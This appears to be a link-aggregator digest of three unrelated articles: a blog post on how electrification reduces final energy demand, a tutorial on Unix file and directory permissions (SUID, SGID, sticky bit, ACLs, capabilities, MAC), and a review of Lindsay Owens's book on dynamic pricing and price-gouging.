This is a fairly simplistic model of the global energy transition, but I think it’s a valuable one. I worked through Nick’s numbers to see what’s going on and will take you through them below.

A few assumptions to start:

  • It doesn’t assume any efficiency gains other than electrification or a move to hydrogen. This is likely to underestimate the reduction in energy demand.

  • It’s a comparison of energy use today: it doesn’t account for energy growth as countries develop. This shouldn’t really affect the ratio between the two scenarios; only the final numbers.

  • All non-electrified sectors will be powered by hydrogen. I’m sure some would disagree and suggest that a few sub-sectors will eventually be electrified, or other alternatives – such as biofuels for aviation – should be used instead. This won’t change the overall conclusion, so feel free to imagine that some of these sub-sectors are powered by non-hydrogen alternatives.

Cars are easy to electrify, high-temperature industrial processes aren’t.

The current and post-transition energy demand by sector is shown in the chart below. Energy demand for transport and buildings drop significantly – we can electrify a lot of road transport, and swap our gas boilers for electric heat pumps.

There are fewer opportunities for industry. Some industrial processes such as space heating can be electrified, but high-temperature industrial processes can’t.

We can also break this down by the mix of fuel and electricity in each sector.

You can see that pre-transition, fuels (burning fossil fuels directly) dominate. Electricity only accounts for one-quarter of the final energy demand.

In the post-transition system, electricity supplies three-quarters. The rest is assumed to be supplied by hydrogen, in sub-sectors that can’t be electrified at the moment.

I’ll now go through each of these sectors in more detail.

Electric vehicles are around four times as efficient as petrol. In a petrol car, only 20% of the energy is converted to motion. In electric cars, this is around 80% (with some variation dependent on regenerative braking). I wrote about this extensively in a previous article .

As you can see in the chart below, the post-transition energy demand for cars and vans is about one-quarter of the current demand.

For heavy-goods vehicles (HGVs), it’s assumed that around half of the distance travelled can be electrified. The other half comes from hydrogen fuel cell electric vehicles.

Buses are 80% electrified, with only long-distance buses powered by hydrogen.

Rail is fully electrified.

Short-haul aviation is electrified, but medium- and long-haul requires hydrogen. So, only one-third is electrified.

Only 10% of marine transport is electrified – this is short-distance trips, such as ferries.

Buildings are nearly completely electrified, and achieve massive efficiency gains.

The biggest user of energy in buildings in temperate climates is space heating . There are large efficiency gains from moving to electric heat pumps .

Nick Eyre suggests that 100% substitution is non-economic during large demand peaks in winter, so 90% are replaced with heat pumps, and 10% comes from hydrogen.

Water heating is entirely replaced by electric heat pumps.

Cooking is completely electrified. The big reduction in energy demand here is partly caused by a transition away from ‘traditional biomass’ in lower-income countries.

Lighting is already electrified, so there’s little change there.

Industrial energy is harder to tackle.

Some high-temperature processes are moved to hydrogen. Most efficiency gains happen from the steel industry: around 25% of the sector is powered by electric arc furnaces. It’s assumed that this increases to 50% (the current mix in OECD countries).

Low-temperature processes are reliant on steam. It’s assumed that fossil fuels are replaced with electric boilers, which are around 20% more efficient.

Drying and separation processes below 120℃ can be converted to heat pumps using existing technologies.

Space heating can also be transitioned to electric heat pumps.

This simple thought experiment shows that electrifying our energy system as much as possible will lead to large reductions in final energy demand. Around 40%.

But this underestimates the potential energy savings for two reasons.

The first is that it is based on final , not primary energy. Primary energy also includes heat that is wasted in producing electricity in the first place: only around one-third of raw coal energy, and half of gas energy is converted to electricity. Eyre estimates that around 70% of primary energy is converted to final energy. 3 If we were to move away from coal and gas for electricity, the energy savings would be even larger.

The second is that it assumes no other efficiency measures are taken. But we know that there are lots of options there – a number of which could improve human wellbeing, cut bills, and reduce energy demand at the same time. Improved insulation is a good example.

Combine some of these measures with electrification, and energy demand could fall a lot. This is a point that has been made many times before.

For a deep dive into different ways of measuring energy, and why electrification reduces demand, see the report “ Beyond Primary Energy: The energy transition needs a new lens ” by Kevin Pahud and colleagues.

“Electrification is efficiency”. Let’s rebuild our energy systems to take advantage of that.

Pre-order my forthcoming book

Unix File and Directory Permissions and Modes (2018)

Lobsters
wpollock.com
2026-09-29 14:22:20
Comments...
Original Article

© 2001–2012 by Wayne Pollock, Tampa Florida USA.

Overview

Unix and Linux systems (including Mac OS X and other POSIX compliant systems) have a (relatively) simple system for controlling access to files and directories.  This system is defined in POSIX.1:2008 standard  external link , also known as the Single Unix Specification ( SUS version 4 ).  And since devices such as disks, ports, etc. have file names (under /dev ) you control access to them the same way.  (Note Windows systems up through Windows ME don't support permissions, just a read only attribute.)

This systems works by assigning a user and a group to every file.  Then users of that file are put into one of three classes:

  • the owner (the process' UID matches the user of the file),
  • the group (not the owner, but the process' GID is a member of the file's group),
  • and other (everyone else).

For each class of users there are three possible permissions that can be granted:

  • read,
  • write, and
  • execute.

Thus there are nine permissions you can set, in any combination.  (Not all combinations make sense however.)

Any attempt to access a file's data requires read permission.  Any attempt to modify a file's data requires write permission.  Any attempt to execute a file (a program or a script) requires execute permission.

In *nix systems directories are also files and thus use the same permission system as for regular files.  Note permissions assigned to a directory are not inherited by the files within that directory.

Because directories are not used in the same way as regular files, the permissions work slightly (but only slightly) differently.  An attempt to list the files in a directory requires read permission for the directory, but not on the files within.  An attempt to add a file to a directory, delete a file from a directory, or to rename a file, all require write permission for the directory, but (perhaps surprisingly) not for the files within. Execute permission doesn't apply to directories (a directory can't also be a program).  But that permission bit is reused for directories for other purposes.

Execute permission is needed on a directory to be able to cd into it (that is, to make some directory your current working directory).

Execute is needed on a directory to access the inode information of the files within.  You need this to search a directory to read the inodes of the files within.  For this reason the execute permission on a directory is often called search permission instead.

You can think of read and execute on directories this way:  directories are data files that hold two pieces of information for each file within, the file's name and it's inode number. Read permission is needed to access the names of files in a directory. Execute (a.k.a. search ) permission is needed to access the inodes of files in a directory, if you already know the file's name.

Search permission is required in many common situations.  Consider the command cat /home/user/foo .  This command clearly requires read permission for the file foo .  But unless you have search permission on / , /home , and /home/user directories, cat can't locate the inode of foo and thus can't read it!  You need search permission on every ancestor directory to access the inode of any file (or directory), and you can't read a file unless you can get to its inode.

Various other commands will need to access the inodes of files to work.  Earlier I said you need write permission on a directory to add, rename, or delete files within.  But all those actions also require changing or at least reading the inodes of the affected files, so search permission is also needed.

Permissions don't determine what commands can access files, they determine what system calls can access files.  The required permissions for system calls are documented in their man pages (section 2).  So to know what permissions are needed to run the command X on a file Y, you need to know (or guess) what system calls X will try to make.

In addition to these standard permissions there are three standard attributes that can be set on any file (these are commonly also referred to as permissions):

  • The set user ID (or SUID ),
  • the set group ID (or SGID ), and
  • the text (or sticky ) attributes.

Finally, there are non-standard attributes and additional permissions (access control lists or ACL s) that may or may not be available on some systems.

The Details

Each file or directory contains 12 settable permission (or mode ) bits, which means there are 2**12 = 4096 possible permission settings!  The 12 bits are either on (set to 1) or off (set to zero).  Each can be changed independently.

All permission and attribute information about a file is kept in the file's inode .  Only the owner of a file (or the root user) can modify information in the inode such as the permission bits and group.  Note the owner needs no permissions set to change permissions; it is enough to be the owner.  Also, only the super-user root can change the owner of a file on most Unix and Linux systems.

Unix doesn't support the idea of inherited permissions.  So, unlike other systems, setting read permission on a directory for some user does not give that user read permission on the files within that directory.

Note that permissions do not grant users the right to run certain programs , rather they grant the right to use certain system calls (of the Unix API ).  A command such as cat or more is written using the read() system call, and only files and directories that have the r permission for a user permit the use of this system call.  This is why a user can't use more , vi , etc., on any file on which they don't have r permission.  Similarly, a user must have w permission to write() a file or directory, which is the system call used to modify files and directories (which are files too).  The x permission permits a user to exec() a file, which means to execute it as a program.  (In Unix, a program or application is just a file that has execute ( x ) permission.)

In short any program makes one or more system calls to access files and directories.  A user process must have been granted the appropriate permissions (one or more of r for read, w for write, or x for execute) or the access will fail.  Note that other system calls (such as stat() ) will also fail if the right permissions aren't granted.

To see all the system calls a given program uses, you can use the strace (or a similar) command.  (This may produce a lot of output!)  Once you know which system call is used, you can check the man pages for that system call to see what permissions are needed to use it.  ( See note .)

Classes of Users

The basic permissions of r , w , and x , are applied to three different categories or classes of users.  Note that every file and directory in Unix is identified with an owner and a group .  The categories/classes are owner (occasionally referred to as the file's user or user owner ), group (or group owner ), and others .  ( See note .)

In addition to these nine mode bits ( r , w , and x , for each of three categories of owner , group , and others ), there are three others: the set User ID ( SUID or setuid ), the set Group ID ( SGID or setgid ), and the sticky (or text ) bit.  The effect of these three bits depends on what other modes are set, and differs for files and directories.

If the person ( * ) attempting to read, write, or execute a file is the same as the owner, the first set of permissions is used and the remaining six bits (three for group and three for others) are ignored.  But if the person is not the same as the owner, the system will check the group of the file against all the groups the person is a member of.  If there is a match then the second set of permissions are used.  If the person is not the owner and not a member of the group for the file, then the third set of permissions is used to determine what access the person is allowed.

To see the permissions for files and directories use the ls -l filename command.  (On a directory, use the ls -ld directoryname command since otherwise ls gives information on the files within that directory and not on the directory itself.)  To illustrate, suppose the permissions for a file named foo are listed as follows:

   -rw-r-----    1 Hymie   staff         78 Aug 14 13:08 foo

The first dash indicates an ordinary file.  On a directory you would see a d instead.  The next nine characters tell what permissions have been granted.  The first three ( rw- ) indicate what permissions have been granted to the owner ( Hymie ) of the file.  In this case the owner has been granted read and write permission, but not execute permission.  The next three show what permissions have been granted to members of the file's group.  Here ( r-- ) they show that group Staff members have read access only.  The last three characters show that the others (i.e., not the owner Hymie and not members of group Staff ) have no permissions granted.

Note the SUID , SGID , and sticky bits have no columns of their own in an ls output, but if turned on they show up as special characters (that is, not x or - ) in the execute columns for the owner, group, and others.  The SUID bit displays as an S in the owner's execute column of the output.  If the execute bit is also set then an s is used.  The SGID bit appears similarly in the group's execute column.  The sticky bit appears in the others' execute column, as a T or as a t if the other execute bit is also set.

An example:

   -rwsr-S--t    1 Hymie   staff         78 Aug 14 13:08 foo

Here, the owner ( Hymie ) is granted read, write, and execute permission, the group members ( staff ) are granted read permission, and others are granted execute permission.  In addition, the SUID , SGID , and sticky bits are all set.

Files

Suppose some user attempts to read a file with some Unix command such as cat .  The system call read() is used and the r permission is required.  The system checks to see if the user is in fact the owner of the file.  If so, the access is permitted if the owner has been granted r permission.  If not, the system check to see if the user is a member of the group of the file.  If so, access is permitted if the group has been granted r permission.

If the user is neither the owner nor a member of the file's group then the access is permitted if others has been granted r permission.

The same logic holds for attempts to modify the file (write) or to run it (execute).

Changing the name of a file or deleting it completely are not tasks that require the write() system call.  So a user doesn't need read ( r ) or write ( w ) permission to rename or delete a file.  You don't even have to be the owner of a file to delete it ( * )!  However, when using mv to move a file to another directory on another disk, (e.g., mv foo /floppy ) the system must copy the file to the other disk and therefore does need read permission.

Special Considerations on Files:

Execute permission and scripts

If a user has execute ( x ) permission on some file but not read ( r ) permission, he or she can execute the file.  In other words, the file is an application program.  However if users don't also have read permission they cannot copy the file, since the cp command requires read ( r ) permission to work.

On the other hand a shell script file with execute permission only will not run!  This is because any script file (including Perl scripts) cannot be executed directly by the system with an exec() system call.  Instead the proper script interpreter (usually shell) is actually executed.  This interpreter in turn attempts to read the script file.  It is possible to run a script without execute permission by entering sh script (or perl script .)

The proper permissions on a script are both read and execute.  Setting the execute bit on causes the kernel to start up the shell ( * ) which reads the script.  This is one reason why scripts are less secure than compiled programs; scripts must be readable and executable but compiled programs need only be executable.

The three attribute mode bits can also affect access to files.  Their effects depend on the other permissions set.

SUID on a file

If any class of user is granted execute permission, then this bit causes the owner of the resulting process to be that of the file and not of the user running the program.  So if the program attempts to read() something, the permissions that apply would be for the owner of the file and not the user of the program.

For example, suppose user Jane runs the command view memo.txt , and the permissions on the view command and the file memo.txt are as follows:

   -rwx--x--x    1 root    bin         4515 Aug 14 13:08 view
   -rw-------    1 root    bin          218 Aug 14 13:08 memo.txt

Jane has permission to run view , but not permission to read memo.txt .  So when this view program attempts to read() the file a permission denied error will occur.

Suppose we change the view program to have the SUID bit on:

   -rws--x--x    1 root    bin         4515 Aug 14 13:08 view

Now, when Jane runs this SUID program, the access to memo.txt is permitted.  When view attempts to read() the file, the system doesn't think Jane is attempting to read, it thinks root is the user.  So the access is allowed.

A similar substitution occurs if the SGID bit is set and any execute bits are set.  The group ID checked is not the current user, but the group of the program.

Technically, every process has a real user ( RUID ) and a real group ( RGID ).  These are the user and group of the person who started the process by running some program.  Every process also has an effective user id EUID and EGID .  By default these are the same.  But if you run a program that has the SUID or SGID bits on, the effective UID or effective GID become those of the file, not of the person.

WARNING: SUID and SGID programs can be dangerous.  They are not usually needed. SUID and SGID scripts are incredibly dangerous and can easily allow evil-doers super-user access to your system!! Never allow a SUID or SGID writable program on your system for even a minute!

SUID and Shell Scripts

The standard is clear that executing a shell script is treated as an execution of sh script , which means the process started uses the permissions of sh (or other interpreter for other types of scripts such as Perl, Python, Ruby, etc.)  This implies that scripts will run ignoring the SUID and SGID bits.  That said, many systems in the past have honored these modes for scripts.  The security of scripts is low compared to compiled programs and even if your system allows a script to run as SUID you shouldn't do so.

SUID and DLL s

Note that today, many executables use dynamic link libraries .  ( DLL s have the extension .so or .so. number on Unix and Linux, where the so stands for shared object .)  Such a program controls which libraries to link to at runtime.  This process uses configuration files in /etc but those system-wide defaults can be over-ridden by setting certain environment variables.  This could be a very dangerous security hole for SUID or SGID programs (I write an evil library, then set the environment variables so that your SUID program runs using my evil code).  So when the EUID or EGID differ from the RUID or RGID , a SUID program ignores the environment variables (e.g., LD_ LIBRARY_PATH ) and only uses DLL s from the standard, preconfigured locations.

SUID and SGID on non-executable files

If the SUID bit is set on a file with no execute bits set ( i.e. a data file), the SUID has no effect.  However, if the SGID bit is set on a file without any execute bits set, then some sort of file and/or record locking may be enabled.  This means that if one process has that file open, any other attempts to open it will block.  In Linux and System V systems, when SGID is set on a file that does not have group execute privileges, this indicates a file that is subject to mandatory locking during access (if the filesystem is mounted to support mandatory locking with mount -o mand ).  This overload of meaning surprises many and is not universal across Unix-like systems.  In fact, the Open Group's Single Unix Specification for chmod(3) permits systems to ignore requests to turn on SGID for files that aren't executable if such a setting has no meaning.

The Sticky (a.k.a. Text ) Bit on Files

The sticky bit was used to keep programs (executable files) in memory, so that the next time any user runs that program it would start faster.  This is obsolete on modern systems which use virtual memory , and no longer has any effect.  On non-executable files, the bit never had any effect.

Some versions of Unix called this the save program text bit (or the text bit).  Old systems that honored this bit on executable files ensured that only the root user could set this bit; otherwise users could have crashed systems by forcing everything into memory.  Modern POSIX systems ignore this bit on regular files but allow any user (not just root) to set/clear this bit on the files they own.

Directories

Directories (and nearly everything else) in Unix are just files.  They contain little information, just the name of a file and its inode number.  System calls that read or modify directories work similarly as for ordinary files.  However the permission bits on directories control access to additional system calls (such as chdir ) then just the few used for regular files (such as read , write , and exec ).

To read the names of files in a directory using read() , or using opendir() or readdir() system calls, requires read permission.  Note the ls command needs this permission to access the names of files in a directory.  Directories also contain inode numbers for each file, but read permission does not grant access to these.

To modify the contents of a directory requires write permission.  If you have write permission on some directory, you can add files to it, rename and delete files from it.

Deleting, linking, and renaming files require execute permission too, as discussed below).  This is because such operations also require access to a file's inode in addition to the file's name.  While read permission will allow access to the name of a file in a directory, execute permission is needed to access the inodes of files in that directory.

Note you don't have to be the owner of a file or have write permission on it to rename or delete it!  You only need write permission on the directory that contains the file.

Execute Permission for Directories

The chdir() system call is one of many that requires execute permission on a directory.  Of course a directory isn't really a program that you can run even if it has execute permission.  The execute bit is reused rather than waste space with additional permission bits.

Besides controlling a user's ability to cd into some directory, the execute permission is required on a directory to use the stat() system call on files within that directory.  The stat() system called is used to access the information in a file's inode , and must be done before you can open or delete (via the unlink() system call) that file.  ( See Note .)

Because of its role in file access the execute bit on a directory is sometimes called search permission.  For example, to read a file foo/bar , you must have read permission for the file itself, but before the file can be accessed you must first search the directory foo for the inode of file bar .  This requires search ( x ) permission on the directory foo .  (Note you don't need read permission on the directory in this case!  You only need read permission on a directory to list its contents.)

Special Considerations on Directories:

Execute Permission

The use of the execute permission on a directory has some non-obvious effects on file access.  Note that if execute permission is required for a directory, it is usually required for each directory component on the full pathname of that directory.

Without execute permission on a directory, a user can't access files in a directory even if they own them and have all permissions on them.

With read but not execute, you can do ls someDir but not ls -l someDir .  With execute but not read permission, you can ls -l someDir/file but not ls someDir or ls -l someDir .  Thinking of the system calls involved ( read and stat ) may help clarify this.  Also, make sure ls isn't aliased to something such as ls --color or ls -F , since these options change the listing to identify directories, links, and executables by using stat , which requires execute permission.  (Try /bin/ls each time, or unalias ls .)

Remember that to use ls -l file , or on some systems ls -i dir (i.e., to use stat() system call), you must have execute on the directory, the directory's parent, and all ancestor directories up to and including / (the root directory).

With execute but not read permission on a directory, users cannot list the contents of the directory but can access files within it if they know about them.

A common situation illustrating all this is user web sites.  If a user's web page is /home/auser/public_html/index.htm , then ' x ' permission is needed for everyone on / , /home , /home/auser , and /home/auser/public_html , and the file index.htm needs ' r ' permission for everyone (' x ' is not needed for the file.)

To delete a file requires both write (to modify the directory itself) and execute (to stat() the file's inode ) on a directory.  Note a user needs no permissions on a file nor be the file's owner to delete it!

To put or create a file in a directory required both w and x permissions.  Write permission is needed because you are modifying the directory with a new hard link, and execute permission is needed in order to use stat , open , and creat system calls.  (Creating a file involves trying to open the file first to see if it already exists and stat if it does, and using either ln to create a new hard link or creat to create a new file.)

SUID and SGID for Directories

The SUID bit has no effect on directories.

In Linux and Solaris, when SGID is set on a directory files created in that directory will have their GID automatically reset to that of the directory's GID .  This means that setting the SGID bit on a directory causes any new files or directories created within to inherit the group identity of that directory rather than that of the user.  Also, new sub-directories will inherit the SGID bit as well.

The purpose of this approach is to support project directories : users can save files into such SGID directories and the group identity of the file automatically changes.  This is useful for example on the Document Root of a website or other directories containing a set of files worked on by a specific group of users.  (It works especially well if each user's primary group ( * ) is a private group for that user, and the umask ( * ) setting is 002 ).  However, setting the setgid bit on directories is not specified by standards such as the Single Unix Specification [ Open Group  external link ].

Sticky bit on Directories

The sticky bit is used on directories that are writable by group or others .  As noted earlier, a user doesn't have to be the owner of a file to delete it, nor have been granted any permissions on that file.  A user needs only write and execute permission on the directory to delete any file contained within it.  However if the sticky bit is also set on the directory, only the owner of a file or the owner of the directory (and the super-user of course) will be able to delete that file.  Public directories such as /tmp use this feature.  (Not all versions of Unix support this use of the sticky bit, unfortunately.)

In Linux 3.6 and newer, the sticky bit has another effect on directories.  If enabled via /proc/sys or sysctl , the kernel won't follow symlinks from a directory with the sticky bit set, to locations outside that directory.  (That is, creating a link in /tmp to a file in, say, /etc won't be followed.  But a link in /tmp to, say, /tmp/foo/bar would be allowed.)  Additionally, hard links can only be created when the user is already the existing file's owner, or if they already have read/write access to the existing file. These changes should prevent a common trick used by attackers to escalate their privileges, a problem noted in the mid-1990s but never addressed.  (Reference: git.kernel.org commit log .)

Other Permission and Attribute Information:

ACLs

Some Unixes (notably HP-UX and Solaris) support the idea of file and directory ACL s (Access control lists), which are a means of granting sets of individual users permissions.  You can think of it this way:  Normally a file is associated with a single user (the user owner) and a single group (the group owner).  With ACL s a file can be associated with multiple users and groups, not just the owner user and group.  Each of these groups and users can be granted any of the normal permissions (read, write, or execute).  Note that only the real file owner can change permissions, just as before.

Some ACL implementations do support inheritance of permissions.  However these ACL s are independent of the standard methods described here, which use the 12 permission bits.  (There is a POSIX standard for ACL s, but it was withdrawn and is not widely used except on Linux.)

If you set the default ACL on a directory, then any subsequently created files/directories will also have their ACL set to a copy of this default AC L.  (This is spoken of as new files inheriting the default ACL of their parent directory, but this term can be confusing; subsequently changing the default ACL on the parent directory will not change the ACL s of any existing files within that directory.)

Try this (using POSIX ACL s):

   cd
   mkdir test
   touch test/foo
   setfacl -d -m user:nobody:r-- test
   touch test/bar
   getfacl -R test

( -d means to change the default ACL , -m means to modify)

You should see that bar is readable by nobody , but that foo is not.  When changing the default ACL of a directory, there is a recursive option for setfacl you can use to change the ACL s of existing files as well.  (In the example above, use:

setfacl -R -m user:nobody:r-- test

ACLs can be used to solve the per-directory umask problem.  In a highly secure system, umask is set to 077 .  But creating a new file in a project workgroup directory, that is a directory holding a group's project's files, this is the wrong value since you would want new files to be accessible by group members.  For directories the value is also wrong since you normally want those to have group read, write, and executable permissions.  On a web site, new files need to be group accessible and also read by others; new subdirectories need execute by others too.

Keeping umask set to a highly secure value and setting a default ACL on a directory to add the desired extra group and other permissions per directory works well, especially if the Set GID is also set on that directory.

The POSIX permission model is showing its age.  Even with the addition of ACLs and extended attributes, it can be difficult to assign exactly the permissions desired.  the lack of permission inheritance and more finely-grained permissions has prompted newer models to be explored.  These are often based on Microsoft's NTFS permission model.  Solaris 10 uses this (and will approximate POSIX permissions for older utilities), as does NFSv4 .

Additional and Extended Attributes

Many types of filesystems support additional attributes on files.  Some examples include the NTFS and the ext family of filesystems.  Usually special utilities are provided to view and change these, such as the ext2 filesystem's lsattr and chattr .  Modern systems also support extended attributes .  These are not pre-defined by the system but consist of name-value pairs.  These can usually be accessed with the utilities getfattr and setfattr .

The output of ls -l indicates when a file has ACL s, additional attributes, extended attributes, or any combination of these.  The eleventh character (the first character following the ten permission/mode characters) will be a space or period unless the file has ACL s or attributes set.  In that case the eleventh character is a + (plus sign).

Rootly Powers

Some operations don't use the permission (mode) bits to allow or deny access.  In some cases permission solely depends on who is making the request.  For example, only the user owner (or root) can change the permissions.  Other operations require the user to be root.  Examples include halting the system and starting daemons (servers) that listen on "privileged ports" (i.e., TCP and UDP port numbers below 1024).  The kernel simply checks the UID of the process to see if it is 0 (root), and grants or denies access accordingly.

While common in Unix and Linux systems this scheme is flawed, in that many programs must be run as root.  Thus, if an attacker finds some exploit in such a program then that user has gained complete control!  This meant that a web server, print server, DNS server, etc., would all run as root.  Many times in the past this has indeed led to security problems.

In some modern systems (notably Solaris and Linux), internally the rootly powers have been split up into about a dozen separate privileges (the term used on Solaris) or capabilities (the term used on Linux).  This internal change is invisible to most users—root gets all these rights and regular users get none, so the system works exactly as before.

Where it gets interesting is that a program that was started by root (and thus has all rootly power) can selectively give up the rights it doesn't need.  All modern server programs thus start as root, give up the rights they don't need, uses the remaining rights, and finally sets the UID to a completely non-privileged user (and dropping all rootly powers they still hold).  In this way, even if an attacker finds an exploit in some server daemon there is very little privilege they can exploit.

You can view a process's privileges on Solaris using the ppriv command, and on Linux using the getpcaps command.  On either system one can also use the /proc system to see this information.  On Linux for example:

  cat /proc/pid/status | grep Cap

MAC and DAC

The twelve permission bits (or mode bits) discussed above, the three special bits ( SUID , SGID , text) and the three groups of user, group, and other permissions, can be changed on any file or directory at the discretion of the owner (or by root).  For this reason such permissions are called discretionary access controls (or DACs ). DAC s can be considered weak because if an attacker gains access to your system they can change these permissions and do whatever they want.

In modern versions of Unix and Linux an alternative can be used.  A separate permission system can be enabled that loads a policy at boot time that determines who can do what.  This policy cannot be modified without a reboot.  ( See Note .) Because the system will require a process to have these permissions to proceed with some operation, this system is called mandatory access controls (or MACs ).

If MAC is enabled, both MAC and DAC systems must allow some operation.  For example, if the DAC permissions allow some user to read a file but the MAC policy doesn't, or if the MAC policy does allow a user to read some file but the DAC doesn't, then access is denied.

Several MAC systems are available.  For Linux, consider using SE Linux  external link or AppArmor  External link for AppArmor .

The End of a Fair Price: Dynamic Pricing and the Normalization of Gouging

Hacker News
prospect.org
2026-09-29 14:09:50
Comments...
Original Article

This article appears in the October 2026 issue of The American Prospect magazine. If you’d like to receive our next issue in your mailbox, please subscribe here .


When inflation spiked shortly after the COVID crisis, neoliberal economists kicked into high gear. Their mission was to defend corporations for all price hikes. The reason why prices were spiking, claimed the adherents to the dismal science, owed to demand—rents ostensibly spiked due to growing demand for home offices—or legitimate cost increases, or really any cause other than the firms actually setting prices higher.

The mainstream media dutifully followed suit . Never mind that corporate profits were soaring, or that companies were using new techniques to personalize prices and even turning over their pricing decisions to third-party consultants making use of artificial intelligence. Prices were simply the work of the invisible hand of the market, not executives wanting to use the opportunities presented by the inflationary environment to smuggle in higher profits.

More from Hal Singer

Whenever a heterodox economist took a dissenting view from the dominant explanations for inflation, including your book reviewer, they were ostracized. We saw this most clearly with Isabella Weber, whose modest suggestion of price controls was mocked as being “truly stupid” by none other than Paul Krugman. (Ironically, it was Krugman who peddled the silly home-office theory of higher rents and ignored, for example, the use of a common pricing algorithm by rival landlords.)

Into this debate stepped Lindsay Owens, a Stanford-educated sociologist, Capitol Hill veteran, and the author of Gouged: The End of a Fair Price—and What That Means for Your Wallet . She broke through the economists’ bluster, first with a viral tweet on price-gouging in 2022, which turned into a New York Times essay . The essay did something that few economists or political analysts bothered with: It listened to the actual earnings calls where executives laid out their plans to ramp up prices as much as they could. There wasn’t an invisible hand after all, but real people telling on themselves to their investors.

The only beneficiaries of personalized pricing are the firms engaged in the predation.

Three years later, Owens went viral again with a white paper about Instacart’s brief dalliance with personalized pricing. The study, conducted by the organization she runs, Groundwork Collaborative, along with Consumer Reports and More Perfect Union, showed that roughly 75 percent of the items in identical Instacart baskets purchased at the same time varied in price from one shopper to the next. Owens’s critique of Instacart’s pricing was so stinging that she managed to spur an investigation by Trump’s otherwise sleepy Federal Trade Commission. Instacart eventually relented, disavowing the surveillance technology in which it had invested millions to rob customers blind.

Now Owens has put everything she’s learned over the past several years together in a book detailing how pricing is distorted, manipulated, and seized upon by profit-hungry corporations. The book is partly a revolt against economists, and deservedly so: As she writes, “I’m sure you can find plenty of economists and CEOs who will tell you that there’s nothing to see here.”

In a seemingly constant audition for corporate funding, many (if not most) economists bend over backwards to defend personalized pricing, often by citing literature related to third-degree price discrimination, such as student or senior discounts. The problem is that personalized pricing is a form of first-degree price discrimination, and the benefits from third-degree price discrimination do not carry over. If we permit a company to charge price- insensitive customers more for the same product, the argument goes, the company can also reduce the price for price- sensitive customers, permitting for an expansion of output. Owens says, archly: “If that sounds like bullshit to you, you’re not alone.” What Owens doesn’t say—again, because she’s not trying to convince conflicted economists—is that so long as the company can charge the price-sensitive types one penny below their willingness to pay under a personalized-pricing regime, no consumer benefits from the exchange .

Consumer surplus, one measure ostensibly guiding neoliberal economic thinking, is literally zero when the price is set at each consumer’s willingness to pay. Price-insensitive types see their consumer surplus get drained, while the price-sensitive types realize no improvement from the status quo. The only beneficiaries of personalized pricing, therefore, are the firms engaged in the predation. And the notion, again peddled by certain economists, that we can take these newfound profits and redistribute them to the losers is hopelessly naïve.

Owens also recognizes a fundamental truth that is rejected by the economic orthodoxy: that consolidation facilitates coordinated price hikes. “Competition is kryptonite for gougers,” she explains in the introduction. “So the first step is to wipe out the competition. And that’s exactly what happened.” Industrial organization economists have made a career of defending consolidation and railing against anyone who thinks that higher markups can be modeled as a function of concentration. They’ve even invented names like “superstars” to reflect firms that take over industries through purportedly superior acumen—and just happen to not share any of the spoils with their workers.

Gouged is a fast read and makes its persuasive case in just 176 pages. As someone who has made a career out of investigating firms engaged in price-fixing and other schemes to separate consumers (or workers) from what is rightly theirs, I presumed the contents would be familiar territory. But Owens uncovered stories and details that were amazingly fresh and powerful, even for this insider.

In Chapter 1, titled “Profiting Off You: High-Tech Pricing Consultants—Part Geek Squad, Part Seal Team Six—Killed the Price Tag,” we learn about Hermann Simon, a German professor and co-founder of Simon-Kucher & Partners (SKP). With a staff of 60 Ph.D.s, including physicists, SKP advised companies on pricing across nearly every major industry. And unlike marketing firms, which respected conflicts of interest, SKP advised purported rivals, like Coke and Pepsi, on how to set their prices. SKP legitimized a science of pricing (price-fixing, really) with a mission: “forming a growing academic infrastructure to help companies optimize prices upward.”

RealPage, which allows landlords to fix prices on rentals by turning over their pricing authority to a common algorithm, is a key villain in Gouged . But the book shows that RealPage is just the latest iteration of conspiracies that have emptied consumers’ wallets for decades. In the late 1980s, U.S. airlines used the Airline Tariff Publishing Company (ATPCO) to signal their future pricing intentions to rivals. ATPCO was used to send “trial balloons” to an airline’s rival, which were accompanied by “footnote designators” specifying the route, fare class, and the terms of the proposed hike. The Department of Justice estimated the ATPCO scheme cost consumers nearly $2 billion between 1988 and 1992.

But after investigating ATPCO, the DOJ opted to settle the case with some minor modifications to slow down the rate of ticket price changes. Not only did this not work, but it led directly to more recent high-tech innovations. In fact, Jeffrey Roper, a former Alaska Airlines executive and principal target in the ATPCO investigation—his computer was seized at one point—was RealPage’s “principal scientist” at launch.

Using similar though more sophisticated techniques, RealPage’s algorithm, called YieldStar, was programmed never to recommend a rent below the minimum rent it suggested, effectively creating a “hard floor” for rent prices. Owens explains the role of RealPage’s “pricing advisers,” who served as enforcers of the cartel; if a proposed rent hike was rejected, the pricing adviser escalated the matter to the landlord’s regional manager. Stephen Winn, RealPage’s CEO, wasn’t satisfied with merely lifting rents via a common algorithm; he also cajoled landlords to “monetize lobbies, parking garages, rooftops, and even broom closets,” and to impose maintenance fees when tenants request repairs.

An army of consultants have turned the price tag into an endlessly evolving suggested charge. Credit: David Tonelson/Alamy.

Uber is another key villain in Gouged . Per Owens, Uber’s “greatest innovation wasn’t ‘disrupting’ the taxi industry—it was socializing and normalizing the very idea of dynamic pricing. They made us comfortable with the notion that prices could change at any moment.” By now, most of us are familiar with Uber’s efforts to customize your fare based on (among other things) where you are getting picked up, where you are heading, and, allegedly, your remaining battery life . What was less understood, at least for this reviewer, is the way Uber has implemented personalized pricing on the labor side of the equation—that is, using worker data to personalize wages.

In 2022, Uber rolled out a system of “upfront pricing,” which permitted it to raise fares while cutting driver pay. Owens reviews the research of Columbia’s Len Sherman, who found that after the introduction of upfront pricing, one Uber driver’s “take rate”—the percentage of the fare captured by the company—increased from 32 to 42 percent by the end of 2024. Similar research by Oxford economists found that Uber’s take rate in the U.K. jumped from 25 to 29 percent after the introduction of upfront pricing. Discrimination is great for the entity doing the discriminating.

A chapter on how companies spy on you was especially disturbing. Did you know that home insurers use aerial drones to study your rooftop? If the conditions signal neglect, they might cancel your coverage before an accident. Did you know that carmakers are reporting your driving tendencies to third parties, who “analyze, bundle, and resell it to insurance companies to hike your premiums or cancel your policy altogether”? Did you know that the McDonald’s app tracks its customers’ “spending habits, visit frequency, and even the time of month when they’re most likely to have disposable income”? McDonald’s can then adjust prices; if the app detects you visiting after payday, Owens explains, it might offer fewer discounts during that period. Did you know that Starbucks sold a Washington Post reporter’s data to more than 60 third parties? We learn that the app adjusted his rewards and discounts downward the more money he spent, presumably an indication that his willingness to pay was higher than originally thought.

